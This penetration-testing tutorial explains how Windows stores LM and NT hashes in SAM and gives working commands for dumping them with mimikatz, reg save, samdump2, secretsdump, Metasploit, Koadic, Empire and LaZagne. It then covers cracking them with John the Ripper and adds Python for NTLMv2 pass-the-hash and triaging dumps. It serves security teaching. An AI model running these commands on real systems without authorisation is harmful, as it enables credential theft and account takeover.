Credential Dumping: SAM


In this article we look at how Windows stores local passwords. Of the hash formats that can appear in SAM we focus on LM and NT hashes and on the LM/NTLM authentication built on them, and then we walk through the tools that dump those hashes from SAM.

Table of content
·         Introduction to SAM
·         How are passwords stored in Windows?
o   LM authentication
o   NTLM authentication
·         Mimikatz
·         PwDump7
·         SamDump2
·         Impacket
·         Metasploit Framework
o   hashdump
o   credential_collector
o   load kiwi
o   Invoke-PowerDump.ps1
o   Get-PassHashes.ps1
·         Koadic
·         PowerShell Empire
o   credentials/mimikatz/sam
o   credentials/powerdump
·         PowerShell
·         LaZagne
·         Cracking the hashes: John The Ripper

Introduction to SAM

SAM is short for Security Account Manager, the database in which Windows keeps its local user accounts and their password hashes. Passwords are never written to SAM in clear text: each one is hashed (an NT hash, and on old systems also an LM hash) and only the hash is stored. The Local Security Authority (LSA, the lsass.exe process) verifies a local logon by hashing the password the user typed and comparing the result with the entry in SAM. The SAM hive is loaded when Windows boots and stays open exclusively for as long as the system is running, which is why the methods below either read it through the registry with SYSTEM privileges or export the hive and process it offline. On disk the hive is C:\Windows\System32\config\SAM; while Windows is running it is mounted in the registry under HKEY_LOCAL_MACHINE\SAM, a key that even administrators cannot browse without first becoming SYSTEM. The hashes inside are additionally encrypted with a key derived from the SYSTEM hive (the boot key), so every offline tool needs both the SAM and the SYSTEM hive.
How are Passwords stored in Windows?
To understand how passwords are saved in Windows we first need to look at the two hash formats SAM can hold, LM and NT, and at the LM/NTLM challenge-response authentication (v1 and v2) that uses them. Kerberos is the domain authentication protocol and is not covered here.
LM authentication
LAN Manager (LM) authentication comes from the Microsoft/3Com LAN Manager network operating system of the late 1980s, and the LM hash it stores is considered broken today. The hash is computed as follows: the password is converted to uppercase, truncated or null-padded to 14 characters, and split into two 7-byte halves; each half is used as a 56-bit DES key to encrypt the fixed string "KGS!@#$%", and the two 8-byte ciphertexts are concatenated into the 16-byte hash. Every step weakens it. There is no salt, the uppercasing removes lowercase letters from the keyspace so a brute-force or dictionary attack never needs to try them, and the split means the attacker cracks two independent 7-character passwords instead of one 14-character one, which a commodity machine can exhaust. A password of seven characters or fewer leaves the second half empty, so its second block is always the constant AAD3B435B51404EE. LM hash storage has been disabled by default since Windows Vista and Server 2008, so on modern systems the LM field of a dump usually holds AAD3B435B51404EEAAD3B435B51404EE, the hash of the empty string.
NTLM authentication
NTLM authentication was introduced to replace LM once LM had proved insecure. The hash it stores in SAM is the NT hash: MD4 over the UTF-16LE encoding of the password. It is case-sensitive and not limited to 14 characters, but it is still unsalted, so two accounts with the same password have the same NT hash. Network authentication is a challenge-response exchange with three messages: negotiate, challenge (the server's nonce) and authenticate (the client's response).
The cleartext password is never stored; only the NT hash is written to SAM. During a network logon the client sends its username, the server generates a random 8-byte challenge (the nonce) and returns it, and the client computes a response from that challenge using the NT hash as the key, never the password itself. For a domain account the server forwards username, challenge and response to a Domain Controller over the Netlogon secure channel; for a local account it does the same work itself against SAM. The verifier does not recover the password: it looks up the stored NT hash, recomputes the expected response for the same challenge, and compares. If the two match, authentication succeeds. This is exactly why SAM dumps are so valuable to an attacker: whoever holds the NT hash can produce a valid response without ever learning the password (pass-the-hash).
NTLMv1 and NTLMv2 follow the same exchange but compute the response differently. In NTLMv1 the 16-byte NT hash is null-padded to 21 bytes and split into three 7-byte DES keys (56 bits each); each key encrypts the 8-byte server challenge with DES in ECB mode, giving a 24-byte response of three 64-bit blocks. The 56-bit keyspace of each block means a captured NTLMv1 response can be cracked regardless of how strong the password is. In NTLMv2 the NT hash is first combined with the uppercased username and the domain through HMAC-MD5 (NTOWFv2), and the response is HMAC-MD5 over the server challenge plus a client-supplied blob containing a timestamp and a client nonce; the proof is 128 bits. Both versions are keyed from the same stored MD4 hash, so dumping SAM defeats both.
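To make the hash-and-response chain above concrete, here is an added Python example (it is not code from the original article) that computes the NT hash exactly as SAM stores it, derives an NTLMv2 response from it, and then performs the verifier's check from the stored hash alone. The username, domain, challenges and the minimal blob with an empty AV-pair list are constructed for the example; MD4 is implemented inline because OpenSSL 3 builds of Python often refuse hashlib.new('md4'). NTLMv1 is left out because it needs a DES implementation.

```python
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), inlined because hashlib.new('md4') is
    frequently unavailable on OpenSSL 3 builds of Python."""
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + fn(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates what was d
        h = [(x + y) & MASK32 for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash as stored in SAM: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain in UTF-16LE."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt, user, domain, server_challenge, client_challenge, timestamp):
    """NtChallengeResponse = NTProofStr || blob, NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob).
    The blob is the minimal MS-NLMP layout with an empty AV-pair list (constructed for this example)."""
    blob = (struct.pack("<BBHI", 1, 1, 0, 0)   # RespType, HiRespType, Reserved1, Reserved2
            + struct.pack("<Q", timestamp)      # FILETIME
            + client_challenge                  # 8-byte client nonce
            + b"\x00" * 4                       # Reserved3
            + struct.pack("<HH", 0, 0)          # MsvAvEOL: empty AV pairs
            + b"\x00" * 4)                      # Reserved4
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def verify_ntlmv2(nt, user, domain, server_challenge, response) -> bool:
    """The verifier's side: recompute NTProofStr from the stored NT hash and the received blob.
    Nothing here needs the cleartext password, which is why a hash dumped from SAM is enough."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


if __name__ == "__main__":
    nt = nt_hash("password")
    print("NT hash of 'password':", nt.hex())
    srv, cli = os.urandom(8), os.urandom(8)   # constructed challenges
    resp = ntlmv2_response(nt, "alice", "WORKGROUP", srv, cli, 0)
    print("verifies with the dumped hash only:", verify_ntlmv2(nt, "alice", "WORKGROUP", srv, resp))
```

The point to take from the verifier function is that it is fed the NT hash, not the password: the same bytes that hashdump or secretsdump print are all a client needs to authenticate as that user.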

Now that we understand what is stored, let's focus on how to dump it. All of the methods below need administrator (or SYSTEM) rights on the target, and they are useful in both internal and external penetration tests once a foothold exists. Let's begin!

Mimikatz

Mimikatz can dump SAM hashes straight from the running system, which makes it the quickest option during an internal penetration test. We have covered mimikatz in a previous article. privilege::debug enables SeDebugPrivilege for the current (administrator) token, token::elevate impersonates the SYSTEM token so that HKLM\SAM becomes readable, and lsadump::sam then reads the boot key from the SYSTEM hive and decrypts the hashes in SAM. Run the following from an elevated mimikatz prompt:

privilege::debug
token::elevate
lsadump::sam



PwDump7
This tool was developed by Tarasco Security. It reads the SAM and SYSTEM hive files directly from the volume rather than through the registry API, so it works while the hives are locked but still needs to run as an administrator. After downloading it, run the following from the command prompt:
PwDump7.exe

As a result it prints every account in SAM in pwdump format (user:RID:LMhash:NThash:::), as shown in the image above.
Next we export the SAM and SYSTEM hives from the registry to files so that they can be processed offline. This must be done from an elevated (administrator) command prompt, and SYSTEM is needed as well as SAM because it holds the boot key that encrypts the hashes:
reg save hklm\sam c:\sam
reg save hklm\system c:\system


Copy both files off the target; the two offline tools in the next sections take them as input.
SamDump2
Once you have the two hive files, samdump2 extracts the boot key from SYSTEM and uses it to decrypt the hashes in SAM. Note the argument order, SYSTEM first:
samdump2 system sam



Impacket
Impacket's secretsdump.py does the same job offline when given the two hives together with the LOCAL keyword in place of a target:
./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL

The same script can dump a live remote host over SMB when run with administrator credentials against that host instead of LOCAL; the output format is the same pwdump layout in both cases.

Metasploit Framework: HashDump

When you have a meterpreter session on the target running as SYSTEM (run getsystem first if it is not), the hashdump command dumps all the hashes from the target's SAM, as shown in the image below:


Another way to get the same result is the post-exploitation module post/windows/gather/hashdump, run against a backgrounded session:
use post/windows/gather/hashdump
set session 1
exploit


Metasploit Framework: credential_collector
Another built-in post-exploitation module, credential_collector, dumps the SAM hashes and also collects tokens from the session. Background your session and run:
use post/windows/gather/credentials/credential_collector
set session 1
exploit


Metasploit Framework: load kiwi
Metasploit also embeds mimikatz as the kiwi extension. Load it with load kiwi (the session must be SYSTEM) and then run the following command to dump the whole SAM:
lsa_dump_sam

The hashes are listed as in the image above.

Metasploit Framework: Invoke-Powerdump.ps1
This Metasploit method uses PowerShell. After getting the meterpreter session, load the PowerShell extension with load powershell, then import the Invoke-PowerDump.ps1 script and call the function it defines (the function name, not the file name, goes to powershell_execute):
powershell_import /root/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump


Once the script has run, the dumped hashes appear as in the image above.
Metasploit Framework: Get-PassHashes.ps1
Again via meterpreter, load the PowerShell extension with load powershell and, just as in the previous method, import the Nishang script Get-PassHashes.ps1 and call its function:
powershell_import Get-PassHashes.ps1
powershell_execute Get-PassHashes


And voila! All the hashes have been retrieved.
Koadic
Once you have a session in the Koadic C2, use the hashdump_sam module to dump the hashes as shown below:
use hashdump_sam
execute


All the hashes from the SAM file will be dumped as shown in the above image.
PowerShell Empire: credentials/mimikatz/sam
Once you have an agent in Empire, interact with it and use the credentials/mimikatz/sam module to dump the hashes with the following commands:
usemodule credentials/mimikatz/sam
execute

This module runs mimikatz inside the agent and dumps the hashes from SAM; like mimikatz itself it needs an elevated agent.
PowerShell Empire: credentials/powerdump
Empire offers another module that dumps the SAM hashes without invoking mimikatz (it is the PowerDump script from the previous sections). To use it, type:
usemodule credentials/powerdump
execute


Yes!! You will have the hashes.
PowerShell
This method is well suited to local testing, i.e. internal testing, when you already have an administrator PowerShell on the box. Import the PowerDump script and call its function:
Import-Module <path of the PowerDump script>
Invoke-PowerDump

And, it will dump all the credentials for you.
LaZagne
LaZagne is a versatile tool for recovering all kinds of stored passwords, and we have covered it in a previous article. Its all mode runs every module, including the hashdump module that reads SAM, which needs administrator rights. To dump SAM hashes with LaZagne, use:
lazagne.exe all

Yay!!! All the credentials have been dumped.
Cracking the Hashes: John The Ripper
John The Ripper is a well-known hash cracking tool that we have covered in two earlier articles (part 1 and part 2). Hashes are not decrypted but cracked: john hashes candidate passwords and compares them with the dump. Once you have dumped the hashes from SAM with any of the methods above, save the pwdump lines to a file (here called hash) and run john with the NT format; --show afterwards prints the passwords it recovered:
john --format=NT hash
john --format=NT hash --show


And as you can see, it will reveal the password by cracking the given hash.
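Every dumper above (PwDump7, samdump2, secretsdump.py, meterpreter's hashdump) prints the same pwdump layout that john reads, so it pays to triage the file before spending cracking time on it. The following added Python example (it is not part of the original article) parses such output, drops the blank NT hash that marks an empty-password or disabled account, flags accounts that still carry an LM hash, and finds password reuse through identical NT hashes. The secretsdump-style sample is constructed for the example; the hashes in it are those of the password "password" and of the empty password.

```python
import re
from collections import defaultdict

# Constants Windows emits for "no LM hash stored" and for an empty NT password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line: user:RID:LMhash:NThash:::  (PwDump7, samdump2, secretsdump and
# meterpreter's hashdump all print this layout)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample in secretsdump.py style (not real output). The NT hashes are
# those of "password" and of the empty password; "legacy" also has the LM hash of
# "password", as an old system that still stores LM would.
SAMPLE_OUTPUT = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Cleaning up...
"""


def parse_pwdump(text):
    """Return one dict per well-formed hash line; banner and status lines are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        e = m.groupdict()
        e["rid"] = int(e["rid"])
        e["lm"], e["nt"] = e["lm"].lower(), e["nt"].lower()
        e["history"] = "_history" in e["user"]  # secretsdump -history adds user_history0 lines
        entries.append(e)
    return entries


def triage(entries):
    """Separate findings from cracking targets.

    empty_password: NT hash is the empty-string hash (blank password or disabled account).
    crack_lm:       an LM hash is still stored; crack it first, it is far cheaper than NT.
    crack_nt:       live NT hashes worth feeding to john --format=NT.
    shared_hash:    identical NT hashes on different accounts, i.e. password reuse
                    (NT hashes are unsalted, so equal hash means equal password)."""
    report = {"empty_password": [], "crack_lm": [], "crack_nt": [], "shared_hash": {}}
    by_nt = defaultdict(list)
    for e in entries:
        if e["history"]:
            continue
        if e["nt"] == EMPTY_NT:
            report["empty_password"].append(e["user"])
            continue
        by_nt[e["nt"]].append(e["user"])
        if e["lm"] != EMPTY_LM:
            report["crack_lm"].append(e["user"])
        report["crack_nt"].append(e["user"])
    report["shared_hash"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return report


def john_input(entries):
    """pwdump lines worth cracking; john --format=NT (or --format=LM) reads them as-is."""
    keep = [e for e in entries if e["nt"] != EMPTY_NT and not e["history"]]
    return "\n".join(f"{e['user']}:{e['rid']}:{e['lm']}:{e['nt']}:::" for e in keep)


if __name__ == "__main__":
    parsed = parse_pwdump(SAMPLE_OUTPUT)
    for key, value in triage(parsed).items():
        print(f"{key}: {value}")
    print(john_input(parsed))
```

On the sample, the shared_hash entry alone tells you that cracking one of the three accounts gives you all of them, and the LM entry for legacy is the cheapest way to get there, since john --format=LM on that line recovers the uppercased password in seconds.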
This article has focused on dumping credentials from the Windows SAM database, showing a number of ways to do it from several platforms. To defend a system you first need to know how it can be attacked and how far the attack reaches, which is why knowing these methods and what they yield matters.




